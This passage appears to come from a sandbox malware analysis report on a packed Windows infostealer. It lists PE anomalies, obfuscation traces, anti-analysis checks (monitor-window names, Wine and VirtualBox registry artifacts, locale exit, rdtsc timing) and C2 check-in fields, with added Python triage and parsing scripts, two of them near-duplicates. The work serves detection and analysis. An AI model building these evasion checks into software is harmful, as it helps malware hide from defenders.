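        findings.append(f"Content-Length {declared} != body length {len(body)}")
    boundary = boundary_from_content_type(lowered["content-type"])
    # Assumption: 4 dashes + 20 uppercase letters is what this one capture shows;
    # it is used here as a weak heuristic, not as a documented Stealc constant.
    if re.fullmatch(r"-{4}[A-Z]{20}", boundary):
        findings.append("boundary is 4 dashes + 20 uppercase letters")
    fields = parse_multipart_fields(body, boundary)
    if set(fields) == {"hwid", "build"}:
        findings.append("body carries exactly hwid and build")
    if config_botnet and fields.get("build") == config_botnet:
        findings.append(f"build field matches configured botnet '{config_botnet}'")
    return findings


if __name__ == "__main__":
    boundary = boundary_from_content_type(CHECKIN_HEADERS["Content-Type"])
    print(parse_multipart_fields(CHECKIN_BODY, boundary))
    for finding in checkin_indicators(CHECKIN_HEADERS, CHECKIN_BODY, CONFIG_BOTNET):
        print("-", finding)
```

Run on the captured request this reports hwid F730F2B77D8C1730677652 and build mars, confirms the 211-byte body matches the declared Content-Length, and lists the missing User-Agent, the two-field body and the build/Botnet match. The same parser can be pointed at a pcap export of any other Stealc check-in to pull the hwid and build for correlation across infections.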

              System Summary

Source: file.exe | Static PE information: section name:
Source: file.exe | Static PE information: section name: .idata
Source: file.exe | Static PE information: section name:
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_006F48B0
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00A2B9A6
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00A9799B
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00D6F18D
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00AAA96A
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00A9A202
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00A90219
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00934A45
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00A9F31E
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00A9BC7F
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00AA0DDE
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00A91D35
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_0093256D
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00A937BF
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00A9D794
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00A8E7C0
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00A98728
Source: C:\Users\user\Desktop\file.exe | Code function: String function: 006D4A60 appears 316 times
Source: file.exe | Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
Source: file.exe | Static PE information: Section: ktlotalb ZLIB complexity 0.9947270297547847
Source: classification engine | Classification label: mal100.troj.evad.winEXE@1/0@0/1
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_006F3A50 CreateToolhelp32Snapshot,Process32First,Process32Next,CloseHandle
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_006ECAE0 CoCreateInstance,MultiByteToWideChar,lstrcpyn
Source: C:\Users\user\Desktop\file.exe | File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\8HXJSKQQ\MTU69GSG.htm
Source: C:\Users\user\Desktop\file.exe | Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
Source: file.exe | ReversingLabs: Detection: 42%
Source: file.exe | Virustotal: Detection: 49%
Source: file.exe | String found in binary or memory: 3Cannot find '%s'. Please, re-install this application
Source: C:\Users\user\Desktop\file.exe | Section loaded: apphelp.dll
Source: C:\Users\user\Desktop\file.exe | Section loaded: winmm.dll
Source: C:\Users\user\Desktop\file.exe | Section loaded: sspicli.dll
Source: C:\Users\user\Desktop\file.exe | Section loaded: wininet.dll
Source: C:\Users\user\Desktop\file.exe | Section loaded: rstrtmgr.dll
Source: C:\Users\user\Desktop\file.exe | Section loaded: ncrypt.dll
Source: C:\Users\user\Desktop\file.exe | Section loaded: ntasn1.dll
Source: C:\Users\user\Desktop\file.exe | Section loaded: iertutil.dll
Source: C:\Users\user\Desktop\file.exe | Section loaded: windows.storage.dll
Source: C:\Users\user\Desktop\file.exe | Section loaded: wldp.dll
Source: C:\Users\user\Desktop\file.exe | Section loaded: profapi.dll
Source: C:\Users\user\Desktop\file.exe | Section loaded: kernel.appcore.dll
Source: C:\Users\user\Desktop\file.exe | Section loaded: ondemandconnroutehelper.dll
Source: C:\Users\user\Desktop\file.exe | Section loaded: winhttp.dll
Source: C:\Users\user\Desktop\file.exe | Section loaded: mswsock.dll
Source: C:\Users\user\Desktop\file.exe | Section loaded: iphlpapi.dll
Source: C:\Users\user\Desktop\file.exe | Section loaded: winnsi.dll
Source: C:\Users\user\Desktop\file.exe | Section loaded: urlmon.dll
Source: C:\Users\user\Desktop\file.exe | Section loaded: srvcli.dll
Source: C:\Users\user\Desktop\file.exe | Section loaded: netutils.dll
Source: C:\Users\user\Desktop\file.exe | Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0358b920-0ac7-461f-98f4-58e32cd89148}\InProcServer32
Source: file.exe | Static file information: File size 1818624 > 1048576
Source: file.exe | Static PE information: Raw size of ktlotalb is bigger than: 0x100000 < 0x1a2000

              Data Obfuscation

Source: C:\Users\user\Desktop\file.exe | Unpacked PE file: 0.2.file.exe.6d0000.0.unpack | section rights, unpacked dump vs original file: [ :EW;.rsrc:W;.idata :W; :EW;ktlotalb:EW;fvaiddkx:EW;.taggant:EW;] vs [ :ER;.rsrc:W;.idata :W; :EW;ktlotalb:EW;fvaiddkx:EW;.taggant:EW;] (the first, blank-named section goes from E+R to E+W)
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_006F6390 GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress
Source: initial sample | Static PE information: section where entry point is pointing to: .taggant
Source: file.exe | Static PE information: real checksum: 0x1be31e should be: 0x1cbe2d
Source: file.exe | Static PE information: section name:
Source: file.exe | Static PE information: section name: .idata
Source: file.exe | Static PE information: section name:
Source: file.exe | Static PE information: section name: ktlotalb
Source: file.exe | Static PE information: section name: fvaiddkx
Source: file.exe | Static PE information: section name: .taggant
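Everything the static hits above say about this file (entry point inside .taggant, sections that are writable and executable, a stored checksum of 0x1be31e where 0x1cbe2d was expected, the near-incompressible ktlotalb section, blank and non-standard section names) can be recomputed from the bytes without a sandbox. The Python below is an added example, not the Joe Sandbox engine or any code from the report: it parses a PE32 header, recomputes the optional-header CheckSum with the algorithm Windows uses, and runs the same checks over a constructed minimal PE that copies this sample's layout. The analysed file is not embedded; the section names, sizes and addresses in build_sample_pe are assumptions, the list of "standard" section names is mine, and Shannon entropy stands in for Joe Sandbox's ZLIB-complexity measure.

```python
import math
import struct

IMAGE_SCN_CNT_CODE = 0x00000020
IMAGE_SCN_MEM_EXECUTE = 0x20000000
IMAGE_SCN_MEM_READ = 0x40000000
IMAGE_SCN_MEM_WRITE = 0x80000000

# Assumption: names a plain MSVC build is expected to carry; anything else is
# reported as non-standard (Joe Sandbox's own list is not published on the page).
STANDARD_SECTIONS = {".text", ".rdata", ".data", ".idata", ".edata", ".rsrc",
                     ".reloc", ".bss", ".tls", ".pdata", ".CRT", ".rodata"}


def pe_checksum(data: bytes, checksum_offset: int) -> int:
    """Optional-header CheckSum as Windows computes it: 16-bit words summed with
    end-around carry, the 4-byte CheckSum field itself skipped, folded to 16 bits,
    then the file length added."""
    total, n = 0, len(data)
    for i in range(0, n - (n % 2), 2):
        if checksum_offset <= i < checksum_offset + 4:
            continue
        total += data[i] | (data[i + 1] << 8)
        total = (total & 0xFFFF) + (total >> 16)
    if n % 2:                                   # odd trailing byte
        total += data[-1]
        total = (total & 0xFFFF) + (total >> 16)
    total = (total & 0xFFFF) + (total >> 16)
    total += total >> 16
    return (total & 0xFFFF) + n


def shannon_entropy(buf: bytes) -> float:
    """Bits per byte; 8.0 is a flat histogram, typical of packed or encrypted data."""
    if not buf:
        return 0.0
    counts = [0] * 256
    for b in buf:
        counts[b] += 1
    n = len(buf)
    return -sum(c / n * math.log2(c / n) for c in counts if c)


def parse_pe(data: bytes) -> dict:
    """Minimal PE32 header parser: entry point, stored checksum, section table."""
    if data[:2] != b"MZ":
        raise ValueError("missing MZ header")
    pe = struct.unpack_from("<I", data, 0x3C)[0]             # e_lfanew
    if data[pe:pe + 4] != b"PE\0\0":
        raise ValueError("missing PE signature")
    nsec = struct.unpack_from("<H", data, pe + 6)[0]
    opt_size = struct.unpack_from("<H", data, pe + 20)[0]
    opt = pe + 24                                            # after the 20-byte COFF header
    if struct.unpack_from("<H", data, opt)[0] != 0x10B:
        raise ValueError("only PE32 is handled here")
    checksum_off = opt + 64
    sections = []
    for i in range(nsec):
        off = opt + opt_size + i * 40
        name, vsize, va, rawsize, rawptr = struct.unpack_from("<8sIIII", data, off)
        sections.append({"name": name.rstrip(b"\0").decode("latin-1"),
                         "vsize": vsize, "va": va, "rawsize": rawsize, "rawptr": rawptr,
                         "characteristics": struct.unpack_from("<I", data, off + 36)[0]})
    return {"entry_rva": struct.unpack_from("<I", data, opt + 16)[0],
            "checksum_off": checksum_off,
            "stored_checksum": struct.unpack_from("<I", data, checksum_off)[0],
            "sections": sections}


def triage(data: bytes) -> dict:
    """Static checks mirroring the report's signatures for this sample."""
    pe = parse_pe(data)
    secs, ep = pe["sections"], pe["entry_rva"]
    wx = IMAGE_SCN_MEM_WRITE | IMAGE_SCN_MEM_EXECUTE
    computed = pe_checksum(data, pe["checksum_off"])
    return {
        "writable_executable": [s["name"] for s in secs if (s["characteristics"] & wx) == wx],
        "non_standard_names": [s["name"] for s in secs if s["name"] not in STANDARD_SECTIONS],
        "odd_names": [s["name"] for s in secs if not s["name"] or not s["name"].isprintable()],
        "entry_point_section": next((s["name"] for s in secs if s["va"] <= ep <
                                     s["va"] + max(s["vsize"], s["rawsize"])), None),
        "high_entropy": [s["name"] for s in secs if s["rawsize"] and
                         shannon_entropy(data[s["rawptr"]:s["rawptr"] + s["rawsize"]]) > 7.0],
        "stored_checksum": pe["stored_checksum"],
        "computed_checksum": computed,
        "checksum_mismatch": pe["stored_checksum"] != computed,
    }


def build_sample_pe() -> bytes:
    """Constructed PE32 in the report's shape: a plain .text, a W+X high-entropy packer
    section named ktlotalb, and the entry point inside .taggant. Not the analysed file."""
    rwx = IMAGE_SCN_CNT_CODE | IMAGE_SCN_MEM_READ | IMAGE_SCN_MEM_WRITE | IMAGE_SCN_MEM_EXECUTE
    rx = IMAGE_SCN_CNT_CODE | IMAGE_SCN_MEM_READ | IMAGE_SCN_MEM_EXECUTE
    sections = [(b".text", 0x200, 0x1000, 0x200, 0x400, rx),        # name, vsize, va, rawsize, rawptr, flags
                (b"ktlotalb", 0x200, 0x2000, 0x200, 0x600, rwx),
                (b".taggant", 0x100, 0x3000, 0x100, 0x800, rwx)]
    buf = bytearray(0x900)
    buf[0:2] = b"MZ"
    struct.pack_into("<I", buf, 0x3C, 0x80)                         # e_lfanew
    pe = 0x80
    buf[pe:pe + 4] = b"PE\0\0"
    struct.pack_into("<HHIIIHH", buf, pe + 4, 0x14C, len(sections), 0, 0, 0, 0xE0, 0x0102)
    opt = pe + 24
    struct.pack_into("<H", buf, opt, 0x10B)                         # PE32 magic
    struct.pack_into("<I", buf, opt + 16, 0x3010)                   # entry point inside .taggant
    # CheckSum at opt + 64 is left as 0, so it will not match the computed value.
    for i, (name, vsize, va, rawsize, rawptr, flags) in enumerate(sections):
        off = opt + 0xE0 + i * 40
        struct.pack_into("<8sIIII", buf, off, name, vsize, va, rawsize, rawptr)
        struct.pack_into("<I", buf, off + 36, flags)
    buf[0x600:0x800] = bytes(range(256)) * 2                        # flat histogram: 8.0 bits/byte
    return bytes(buf)
```

Run triage on the constructed file and it reports ktlotalb and .taggant as writable+executable and non-standard, the entry point in .taggant, ktlotalb as high-entropy, and a checksum mismatch; pointed at the real sample it would reproduce the 0x1be31e vs 0x1cbe2d pair from the report. A checksum mismatch alone is weak evidence (many legitimate builds leave the field at zero), which is why the report only lists it alongside the section-rights and entry-point findings.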
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00AF70A1 | push edx; mov dword ptr [esp], eax | at 0_2_00AF710C
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00AF70A1 | push ebx; mov dword ptr [esp], 47FFCFEBh | at 0_2_00AF717C
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_0099B817 | push eax; mov dword ptr [esp], edi | at 0_2_0099B848
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00A0102F | push esi; mov dword ptr [esp], ecx | at 0_2_00A01091
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00A0102F | push 5A877B96h; mov dword ptr [esp], ecx | at 0_2_00A010A9
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00A0102F | push 377825ECh; mov dword ptr [esp], esi | at 0_2_00A01109
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00D6F046 | push 43D3EA01h; mov dword ptr [esp], esi | at 0_2_00D6F060
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00D6F046 | push edx; mov dword ptr [esp], eax | at 0_2_00D6F0EC
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00D6F046 | push ebp; mov dword ptr [esp], edi | at 0_2_00D6F136
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00D6F046 | push 41C0D35Bh; mov dword ptr [esp], edx | at 0_2_00D6F146
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00B3601A | push 5E6E137Dh; mov dword ptr [esp], edx | at 0_2_00B360BA
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00B37808 | push esi; mov dword ptr [esp], 673D44C3h | at 0_2_00B37828
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00B37808 | push 410E31D9h; mov dword ptr [esp], edi | at 0_2_00B37886
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00B2585E | push eax; mov dword ptr [esp], ecx | at 0_2_00B25897
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00B2585E | push edi; mov dword ptr [esp], 69D73AADh | at 0_2_00B258D3
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00B3D05E | push eax; mov dword ptr [esp], ecx | at 0_2_00B3D0C3
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00B0B844 | push 689B4020h; mov dword ptr [esp], ebx | at 0_2_00B0B8F2
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_006F7895 | push ecx; ret | at 0_2_006F78A8
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00A2B9A6 | push eax; mov dword ptr [esp], 375E771Dh | at 0_2_00A2BA71
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00A2B9A6 | push eax; mov dword ptr [esp], 00000000h | at 0_2_00A2BA7C
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00B691BB | push 04786FDCh; mov dword ptr [esp], eax | at 0_2_00B691C9
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00A421B2 | push edx; mov dword ptr [esp], 5FFB08C6h | at 0_2_00A421CA
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00AFD1B8 | push 4B4D1780h; mov dword ptr [esp], ecx | at 0_2_00AFD07A
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00AFD1B8 push 1BA288D8h; mov dword ptr [esp], esp0_2_00AFD086
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00AFD1B8 push 6AD83951h; mov dword ptr [esp], eax0_2_00AFD137
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00AFD1B8 push ecx; mov dword ptr [esp], ebx0_2_00AFD26B
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00B021AE push 522893E0h; mov dword ptr [esp], esp0_2_00B02208
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00AFE183 push 098368B1h; mov dword ptr [esp], eax0_2_00AFE252
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00A9799B push ebx; mov dword ptr [esp], ecx0_2_00A97B0C
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00A9799B push edx; mov dword ptr [esp], 2C3FAC8Fh0_2_00A97B35
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00A9799B push 4E817043h; mov dword ptr [esp], eax0_2_00A97B70
              Source: file.exeStatic PE information: section name: ktlotalb entropy: 7.953808947357536
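The static findings above (entry point inside .taggant, a stored checksum that does not match the file, random-looking and unprintable section names, one section at 7.95 bits per byte) are what a packer leaves behind, and all of them can be read from the headers without running the sample. The script below is an added example, not part of the Joe Sandbox report and not code from the sample: it walks the PE headers with the standard library only, recomputes the optional-header CheckSum the way the Windows loader does, and measures per-section entropy. The image it triages is constructed in build_sample() to mirror this report's section layout; the section names it uses, the deliberately stale CheckSum value, the STANDARD_SECTIONS list and the 7.0 entropy threshold are assumptions of the example rather than facts from the report.

```python
"""Static PE triage with the standard library only: entry-point section, unusual
section names, per-section entropy, and whether the stored CheckSum matches the
file. The PE built in build_sample() is constructed for this example; it is not
the analysed file.exe."""
import math
import struct

PE_MAGICS = (0x10B, 0x20B)                      # PE32, PE32+
# Conventional names; anything else deserves a look (heuristic, not a rule).
STANDARD_SECTIONS = {".text", ".data", ".rdata", ".idata", ".edata", ".rsrc",
                     ".reloc", ".bss", ".tls", ".pdata", ".CRT", "CODE", "DATA", "BSS"}


def entropy(buf: bytes) -> float:
    """Shannon entropy in bits per byte, 0.0 .. 8.0."""
    if not buf:
        return 0.0
    counts = [0] * 256
    for b in buf:
        counts[b] += 1
    n = len(buf)
    return -sum(c / n * math.log2(c / n) for c in counts if c)


def pe_checksum(data: bytes, checksum_offset: int) -> int:
    """Recompute the optional-header CheckSum as CheckSumMappedFile does: 32-bit sum
    with end-around carry, skipping the CheckSum field, folded to 16 bits, plus length."""
    padded = data + b"\x00" * (-len(data) % 4)
    total = 0
    for off in range(0, len(padded), 4):
        if off == checksum_offset:
            continue
        total += struct.unpack_from("<I", padded, off)[0]
        total = (total & 0xFFFFFFFF) + (total >> 32)
    total = (total & 0xFFFF) + (total >> 16)
    total += total >> 16
    return (total & 0xFFFF) + len(data)


def parse_pe(data: bytes) -> dict:
    """Minimal header walk: DOS header -> PE signature -> COFF -> optional -> sections."""
    if data[:2] != b"MZ":
        raise ValueError("not an MZ file")
    e_lfanew = struct.unpack_from("<I", data, 0x3C)[0]
    if data[e_lfanew:e_lfanew + 4] != b"PE\x00\x00":
        raise ValueError("PE signature missing")
    coff = e_lfanew + 4
    nsections = struct.unpack_from("<H", data, coff + 2)[0]
    opt_size = struct.unpack_from("<H", data, coff + 16)[0]
    opt = coff + 20
    if struct.unpack_from("<H", data, opt)[0] not in PE_MAGICS:
        raise ValueError("unknown optional header magic")
    sections = []
    for i in range(nsections):
        raw_name, vsize, va, rsize, rptr = struct.unpack_from("<8sIIII", data, opt + opt_size + 40 * i)
        sections.append({"raw_name": raw_name, "name": raw_name.rstrip(b"\x00").decode("latin-1"),
                         "va": va, "vsize": vsize, "data": data[rptr:rptr + rsize]})
    return {"entry_rva": struct.unpack_from("<I", data, opt + 16)[0],
            "checksum_offset": opt + 64,            # same offset in PE32 and PE32+
            "stored_checksum": struct.unpack_from("<I", data, opt + 64)[0],
            "sections": sections}


def section_for_rva(sections, rva):
    for s in sections:
        if s["va"] <= rva < s["va"] + max(s["vsize"], len(s["data"])):
            return s
    return None


def odd_section_name(raw_name: bytes) -> bool:
    name = raw_name.rstrip(b"\x00")
    if not name or any(b < 0x20 or b > 0x7E for b in name):
        return True                                 # empty or "special chars"
    return name.decode() not in STANDARD_SECTIONS


def triage(data: bytes, packed_threshold: float = 7.0) -> dict:
    pe = parse_pe(data)
    ep = section_for_rva(pe["sections"], pe["entry_rva"])
    real = pe_checksum(data, pe["checksum_offset"])
    ent = {s["name"]: entropy(s["data"]) for s in pe["sections"]}
    return {"entry_section": ep["name"] if ep else None,
            "stored_checksum": pe["stored_checksum"], "real_checksum": real,
            # 0 means "never set" (common, harmless); a wrong non-zero value means the
            # image was modified after linking, which is what packers leave behind.
            "checksum_ok": pe["stored_checksum"] in (0, real),
            "odd_names": [s["name"] for s in pe["sections"] if odd_section_name(s["raw_name"])],
            "entropy": ent,
            "packed": [n for n, e in ent.items() if e > packed_threshold]}


def build_sample(fix_checksum: bool = False) -> bytes:
    """Constructed PE32 mirroring this report's layout: a normal .idata, a high-entropy
    'ktlotalb' body, a section with an unprintable name, and the entry point in
    .taggant. The stored CheckSum (0xDEADBEEF) is deliberately stale."""
    bodies = [(b".idata", b"\x00" * 0x100 + b"kernel32.dll\x00" * 4),
              (b"ktlotalb", bytes((i * 73 + 41) & 0xFF for i in range(0x400))),  # 8.0 bits/byte
              (b"\x01\x02\x03", b"\x90" * 0x40),
              (b".taggant", b"\xE9" + b"\x00" * 0x20)]
    falign, salign = 0x200, 0x1000
    hdr_len = -(-(0x40 + 4 + 20 + 224 + 40 * len(bodies)) // falign) * falign
    dos = bytearray(0x40)
    dos[:2] = b"MZ"
    struct.pack_into("<I", dos, 0x3C, 0x40)                  # e_lfanew
    coff = struct.pack("<HHIIIHH", 0x14C, len(bodies), 0, 0, 0, 224, 0x102)
    opt = bytearray(224)
    struct.pack_into("<H", opt, 0, 0x10B)                    # PE32 magic
    struct.pack_into("<I", opt, 16, salign * len(bodies))    # entry RVA = last section
    struct.pack_into("<II", opt, 32, salign, falign)
    struct.pack_into("<I", opt, 60, hdr_len)                 # SizeOfHeaders
    struct.pack_into("<I", opt, 64, 0xDEADBEEF)              # stale CheckSum
    headers, blobs, rptr = b"", b"", hdr_len
    for i, (name, body) in enumerate(bodies):
        rsize = -(-len(body) // falign) * falign
        headers += struct.pack("<8sIIIIIIHHI", name, len(body), salign * (i + 1), rsize, rptr,
                               0, 0, 0, 0, 0xC0000040)
        blobs += body + b"\x00" * (rsize - len(body))
        rptr += rsize
    image = bytearray(bytes(dos) + b"PE\x00\x00" + coff + bytes(opt) + headers)
    image += b"\x00" * (hdr_len - len(image)) + blobs
    if fix_checksum:
        struct.pack_into("<I", image, 0x40 + 4 + 20 + 64, pe_checksum(bytes(image), 0x40 + 4 + 20 + 64))
    return bytes(image)


if __name__ == "__main__":
    for key, value in triage(build_sample()).items():
        print(key, value)
```

Run it as a script to see the verdict for the constructed image, or pass the bytes of a real file to triage(). A stored CheckSum of zero is unremarkable; a non-zero value that disagrees with the recomputed one, as in this report, means the image was altered after the linker wrote it.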

Boot Survival

Source: C:\Users\user\Desktop\file.exe | Window searched: window name: FilemonClass
Source: C:\Users\user\Desktop\file.exe | Window searched: window name: PROCMON_WINDOW_CLASS
Source: C:\Users\user\Desktop\file.exe | Window searched: window name: RegmonClass
Source: C:\Users\user\Desktop\file.exe | Window searched: window name: FilemonClass
Source: C:\Users\user\Desktop\file.exe | Window searched: window name: PROCMON_WINDOW_CLASS
Source: C:\Users\user\Desktop\file.exe | Window searched: window name: Regmonclass
Source: C:\Users\user\Desktop\file.exe | Window searched: window name: Filemonclass
Source: C:\Users\user\Desktop\file.exe | Window searched: window name: PROCMON_WINDOW_CLASS
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_006F6390 GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress | 0_2_006F6390

Malware Analysis System Evasion

Source: C:\Users\user\Desktop\file.exe | Evasive API call chain: GetUserDefaultLangID, ExitProcess
Source: C:\Users\user\Desktop\file.exe | File opened: HKEY_CURRENT_USER\Software\Wine
Source: C:\Users\user\Desktop\file.exe | File opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__
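Before re-running a sample that searches for Filemon, Procmon and Regmon windows, opens the Wine and VirtualBox registry artifacts, and reads the default language before calling ExitProcess, it helps to know which of those tells the analysis VM itself would trip. The script below is an added example, not code from the report or from the sample. Its decision logic is plain Python and runs anywhere; the Win32 probes (FindWindowW, registry opens, GetUserDefaultLangID, the same APIs the sample's checks rely on) run only on Windows. The report does not say which language IDs make the sample exit, so evaluate() takes that set as a parameter; counter_deltas() is a stand-in for the sample's back-to-back rdtsc reads, since Python cannot issue rdtsc itself, and the 50000 ns threshold is an assumption.

```python
"""Analyst self-check: which of the sandbox/tool tells used by this sample would
fire on the current machine. Decision logic is pure Python; the probes that need
Win32 run only on Windows."""
import sys
import time

# Strings exactly as reported for this sample.
WINDOW_CLASSES = ["FilemonClass", "PROCMON_WINDOW_CLASS", "RegmonClass"]
REGISTRY_KEYS = [("HKEY_CURRENT_USER", r"Software\Wine"),
                 ("HKEY_LOCAL_MACHINE", r"HARDWARE\ACPI\DSDT\VBOX__")]


def primary_language_id(langid: int) -> int:
    """Low 10 bits of a Windows LANGID (the PRIMARYLANGID macro)."""
    return langid & 0x3FF


def sublanguage_id(langid: int) -> int:
    """Upper 6 bits of a Windows LANGID (the SUBLANGID macro)."""
    return (langid >> 10) & 0x3F


def timing_looks_instrumented(deltas, threshold: int) -> bool:
    """Two counter reads with nothing between them should be tiny; a debugger
    single-stepping or an emulator inflates them. The median is used so one
    scheduling hiccup does not trip the check."""
    ordered = sorted(deltas)
    return ordered[len(ordered) // 2] > threshold


def counter_deltas(samples: int = 32):
    """Stand-in for the rdtsc pairs (assumption): the high-resolution monotonic
    counter is read twice in a row, like the sample's rdtsc ... rdtsc."""
    out = []
    for _ in range(samples):
        first = time.perf_counter_ns()
        second = time.perf_counter_ns()
        out.append(second - first)
    return out


def evaluate(found_windows, found_keys, langid, exit_on_primary_langs, deltas, tick_threshold):
    """List the tells that would fire, in the order the report shows the sample checking them."""
    tells = []
    primary = primary_language_id(langid)
    if primary in exit_on_primary_langs:
        tells.append("locale 0x%04x (primary 0x%02x): sample calls ExitProcess" % (langid, primary))
    for cls in found_windows:
        tells.append("monitor window present: " + cls)
    for hive, key in found_keys:
        tells.append("artifact key present: %s\\%s" % (hive, key))
    if timing_looks_instrumented(deltas, tick_threshold):
        tells.append("counter delta above %d: instrumented or emulated" % tick_threshold)
    return tells


def probe_windows():
    """Win32 probes through the APIs the sample uses. Returns empty results off Windows."""
    if sys.platform != "win32":
        return [], [], None
    import ctypes
    import winreg
    user32 = ctypes.windll.user32
    kernel32 = ctypes.windll.kernel32
    windows = [cls for cls in WINDOW_CLASSES if user32.FindWindowW(cls, None)]
    hives = {"HKEY_CURRENT_USER": winreg.HKEY_CURRENT_USER,
             "HKEY_LOCAL_MACHINE": winreg.HKEY_LOCAL_MACHINE}
    keys = []
    for hive, key in REGISTRY_KEYS:
        try:
            winreg.CloseKey(winreg.OpenKey(hives[hive], key))
            keys.append((hive, key))
        except OSError:
            pass
    return windows, keys, kernel32.GetUserDefaultLangID() & 0xFFFF


if __name__ == "__main__":
    wins, keys, langid = probe_windows()
    # The report does not list the language IDs that make the sample exit; fill the
    # set from your own config extraction (assumption: empty by default).
    for tell in evaluate(wins, keys, langid or 0, set(), counter_deltas(), tick_threshold=50_000):
        print(tell)
```

On the sandbox VM this prints the tells in the order the sample evaluates them; anything that appears is a change to make (close the monitor, rename or hide the artifact key, pick a default language the sample does not reject) before the next run, otherwise the run ends at ExitProcess before any C2 traffic.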
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: AA69F8 second address: AA6A02 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push esi 0x00000005 pop esi 0x00000006 popad 0x00000007 pushad 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: AA6A02 second address: AA6A10 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jno 00007FD184FDBE76h 0x0000000a pushad 0x0000000b popad 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: AA6A10 second address: AA6A1C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop esi 0x00000006 push eax 0x00000007 push edx 0x00000008 push eax 0x00000009 push edx 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: AA6A1C second address: AA6A26 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jnc 00007FD184FDBE76h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: AA6A26 second address: AA6A31 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push edi 0x00000007 pushad 0x00000008 popad 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
